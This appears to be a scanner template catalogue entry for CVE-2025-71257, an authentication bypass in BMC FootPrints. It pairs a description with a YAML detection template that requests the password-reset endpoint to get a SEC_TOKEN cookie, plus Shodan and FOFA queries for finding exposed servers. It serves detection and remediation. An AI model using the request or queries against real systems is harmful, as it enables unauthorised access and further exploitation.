BMC FootPrints - Authentication Bypass
CVE-2025-71257
Verified
Description
BMC FootPrints versions 20.20.02 through 20.24.01.001 contain an authentication bypass vulnerability in the password reset functionality. Unauthenticated attackers can access the /footprints/servicedesk/passwordreset/request/ endpoint to obtain a valid SEC_TOKEN session cookie without proper authentication. This vulnerability enables exploitation of other vulnerabilities in the chain including CVE-2025-71258 and CVE-2025-71259 (SSRF) and CVE-2025-71260 (deserialization RCE).
Severity
Medium
CVSS Score
6.5
Exploit Probability
4%
Affected Product
footprints
Published Date
March 18, 2026
Template Author
watchtowr, dhiyaneshdk
CVE-2025-71257.yaml
id: CVE-2025-71257
info:
name: BMC FootPrints - Authentication Bypass
author: watchTowr,DhiyaneshDk
severity: medium
description: |
BMC FootPrints versions 20.20.02 through 20.24.01.001 contain an authentication bypass vulnerability in the password reset functionality. Unauthenticated attackers can access the /footprints/servicedesk/passwordreset/request/ endpoint to obtain a valid SEC_TOKEN session cookie without proper authentication. This vulnerability enables exploitation of other vulnerabilities in the chain including CVE-2025-71258 and CVE-2025-71259 (SSRF) and CVE-2025-71260 (deserialization RCE).
impact: |
Unauthenticated attackers can bypass access controls to access and modify application data and system resources.
remediation: |
Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2025-71257
epss-score: 0.044
epss-percentile: 0.90137
cwe-id: CWE-287
reference:
- https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/
- https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/
metadata:
verified: true
max-request: 1
shodan-query: html:"/footprints/servicedesk/"
product: footprints
vendor: bmc
fofa-query: body="/footprints/servicedesk/"
tags: cve,cve2025,servicedesk,bmc-software,auth-bypass,footprints,bmc,vkev
variables:
string: "{{to_lower(rand_base(8))}}"
http:
- raw:
- |
GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: set_cookie
words:
- "SEC_TOKEN="
# digest: 4a0a00473045022100f69b7ba9b1a67f0a7b87c572d3034024360b29fcbbbf04aa35ad460ef2637e8c0220626d2259c3289ab02aabd6a3dcf095ce168da269f49b28a3583d62a8bbc39024:922c64590222798bb761d5b6d8e729506.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
CVE ID:
cve-2025-71257
CWE ID:
cwe-287
Remediation Steps
Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.